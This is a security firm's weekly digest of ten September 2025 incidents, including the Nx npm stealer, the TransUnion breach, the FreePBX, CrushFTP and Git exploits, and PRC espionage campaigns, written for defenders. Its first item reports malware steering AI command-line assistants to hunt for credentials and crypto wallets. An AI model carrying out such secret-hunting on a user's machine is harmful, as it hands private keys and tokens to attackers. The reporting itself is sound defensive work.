By security practitioners, for security practitioners novacoast federal | Apex Program | novacoast | about innovate
By security practitioners, for security practitioners

Weekly Top 10: 09.01.2025: Attackers Abuse Velociraptor IR Tool; npm ‘Nx’ Supply-Chain Attack Leaks ~20K Sensitive Files; TransUnion Breach Hits 4.4M People, and More.

WEEKLY TOP TEN: September 01, 2025, 16:00 GMT

  1. npm ‘Nx’ Supply-Chain Attack Leaks ~20K Sensitive Files

    Attackers compromised the popular Nx npm framework and seven plugins, pushing trojanized versions that installed a telemetry.js stealer. In just over four hours on August 26–27, more than 1,000 developers were infected, and roughly 20,000 sensitive files leaked publicly.

    The malware took advantage of AI command-line tools—Claude Code, Gemini, and Amazon Q—to search for tokens, SSH keys, cloud credentials, and crypto wallets, and then automatically created “s1ngularity” GitHub repositories in the victims’ accounts. GitHub disabled those repositories, but many stolen GitHub tokens remained active. Researchers at Socket and Wiz tracked the campaign and urged credential rotation.
  2. Ransomware Crew Gains Full Azure Control via Hybrid-Cloud Gaps

    Microsoft explains how Storm-0501 exploited hybrid identity gaps to seize the Global Administrator role in Entra ID and then escalated to Azure Owner across subscriptions from a hybrid-joined device. Using AzureHound reconnaissance, AzCopy, and storage-key theft, the group exfiltrated data, exposed private storage to the internet, mass-deleted backups, and leveraged cloud-native encryption—achieving cloud-based ransomware impact without endpoint lockers.

    TThe intrusion affected multiple Active Directory domains and Entra Connect Sync servers by exploiting a synced non-human identity that lacked MFA, allowing the attackers to reset passwords and register their own MFA. Microsoft warns Storm-0501 hunts unmanaged devices and hybrid-cloud misconfigurations, then uses cloud-native commands for discovery, escalation, exfiltration, deletion, and extortion.
  3. Transunion Breach Hits 4.4M People

    TransUnion confirmed a breach affecting over 4.4 million U.S. individuals after attackers accessed data via a Salesforce account tied to consumer support operations. ShinyHunters and UNC6395 claimed responsibility, asserting 13 million records were stolen, including 4.4 million U.S. profiles.

    Names, billing addresses, phone numbers, email addresses, dates of birth, unredacted Social Security numbers, and support tickets and messages are among the exposed data. The breach occurred July 28 and was discovered July 30, per a Maine AG filing. TransUnion says credit reports weren’t exposed and is offering 24 months of identity protection. BleepingComputer links this incident to a broader Salesforce data-theft wave.
  4. FreePBX Zero-Day Actively Exploited

    Sangoma’s FreePBX team warns of an actively exploited zero-day targeting servers whose Administrator Control Panel is exposed to the internet. Exploitation began around August 21, leading to an emergency EDGE module fix for the Endpoint module, with a standard security release to follow.

    The fix protects new installs but will not clean compromised systems. Reported intrusions affected 3,000 SIP extensions and 500 trunks. Key indicators include missing or altered /etc/freepbx.conf, presence of /var/www/html/.clean.sh, Apache logs referencing modular.php, unusual calls to extension 9998, and unauthorized “ampuser” entries. Admins should isolate systems, restore from pre-August-21 backups, rotate credentials, and restrict ACP access.
  5. CISA & Allies Publish Joint CSA on PRC Apt Activity

    CISA, NSA, FBI, and international partners released a joint advisory on PRC-nexus APT actors compromising networks worldwide, especially in telecom, government, transportation, lodging, and defense. They target provider-edge and customer-edge routers with low visibility, modifying firmware and configurations to evade detection and maintain persistent access to feed espionage systems.

    Built from investigations through July 2025, the guidance emphasizes behavior over naming, noting overlaps with Salt Typhoon, OPERATOR PANDA, RedMike, UNC5807, and GhostEmperor. Defenders are urged to hunt for router-level abuse and apply mitigations in the advisory. The alert highlights critical infrastructure risks and links to a full technical CSA for actions and detection.
  6. Hackers Exploit CrushFTP Zero-Day to Take Over Servers

    Researchers warn that hackers are actively exploiting a zero-day vulnerability in CrushFTP to take over servers. Tracked as CVE-2025-54309 and listed in CISA’s Known Exploited Vulnerabilities catalog, this flaw lets hackers run their code and upload any files they want, which helps them gain access to networks.

    Discovery and exploitation evidence are credited to WatchTowr Labs, with adoption by threat actors. Admins should update immediately, review access logs for suspicious uploads or admin actions, rotate credentials and keys, and isolate instances. Given CrushFTP’s widespread use across enterprises and government, exploitation poses serious risks of data theft, ransomware deployment, and lateral movement.
  7. CISA: Git RCE (CVE-2025-48384) Is Being Exploited

    CISA added Git CVE-2025-48384 to the Known Exploited Vulnerabilities catalog. The flaw stems from inconsistent handling of carriage return chars in configuration files, causing submodule path misresolution. Attackers can publish repositories with submodules ending in \r and a crafted symlink plus malicious hook to achieve arbitrary code execution on machines that clone them.

    Patches are available in Git 2.43.7, 2.44.4, 2.45.4, 2.46.4, 2.47.3, 2.48.2, 2.49.1, and 2.50.1. If updating isn’t possible, avoid recursive submodule clones from untrusted sources, disable hooks via core.hooksPath, and allow only audited submodules. Federal agencies face a September 15 deadline to patch or cease use immediately.
  8. WhatsApp Patches Zero-Click Exploit Targeting iOS and macOS Devices

    WhatsApp issued an emergency update for CVE-2025-55177, a zero-click flaw affecting iOS and macOS clients that stems from insufficient authorization of linked-device synchronization messages. The bug could let an unrelated user trigger processing of content from an arbitrary URL on a target device and was likely chained with Apple’s CVE-2025-43300 (ImageIO out-of-bounds write) in highly targeted spyware attacks.

    Patches landed in WhatsApp for iOS 2.25.21.73 (July 28) and WhatsApp Business/Mac 2.25.21.78 (August 4). WhatsApp sent in-app threat notifications to fewer than 200 users and advised factory resets and prompt updating. Organizations should verify versions and monitor for suspicious device-linking activity.
  9. Attackers Abuse Velociraptor IR Tool

    Sophos reports threat actors installed the open-source Velociraptor incident-response tool via msiexec from a Cloudflare Workers domain, then used it to fetch Visual Studio Code with tunneling enabled for command-and-control. The chain also deployed a Cloudflare tunnel and Radmin, living off legitimate tools to evade detections.

    At the same time, attackers pretended to be IT staff on Microsoft Teams to trick people into installing remote-access tools and PowerShell scripts to steal passwords and stay hidden—methods often used by ransomware groups. Security teams should watch for any unauthorized use of Velociraptor, as this may indicate a warning sign of possible ransomware. Additionally, they should check audit logs for tunneling and MSI installations, while ensuring that IDE EDR coverage and user training are prioritized.
  10. Deception in Depth: PRC-Nexus Espionage Campaign Hijacks Web Traffic to Target Diplomats

    Google Threat Intelligence details a PRC-nexus campaign, tracked as UNC6384, that hijacks captive-portal traffic to deliver a digitally signed STATICPLUGIN downloader masquerading as an Adobe plugin update. The chain downloads an MSI that side-loads CANONSTAGER, which decrypts and executes SOGU.SEC (PlugX) in memory.

    An adversary-in-the-middle on edge devices redirects browsers from gstatic connectivity checks to a malicious landing page using valid TLS, social engineering, and code-signed binaries to blunt warnings and inspection. Google issued government-backed attacker alerts, added IOCs to Safe Browsing, and updated Security Operations hunts. The report highlights overlaps with TEMP.Hex/Mustang Panda and the longstanding use of signed malware are also contributing factors.

Our Threat Operations and Intelligence team compiles a daily digest of the most recent online cybersecurity risks. The following top 10 stories were selected from the 40+ original ones we determined to be most significant during the course of the week, ranked by highest risk, and using multiple sources when available:

Previous Post

The Intersection of AI Governance and Cybersecurity: Building Resilient Systems

Innovate uses cookies to give you the best online experience. If you continue to use this site, you agree to the use of cookies. Please see our privacy policy for details.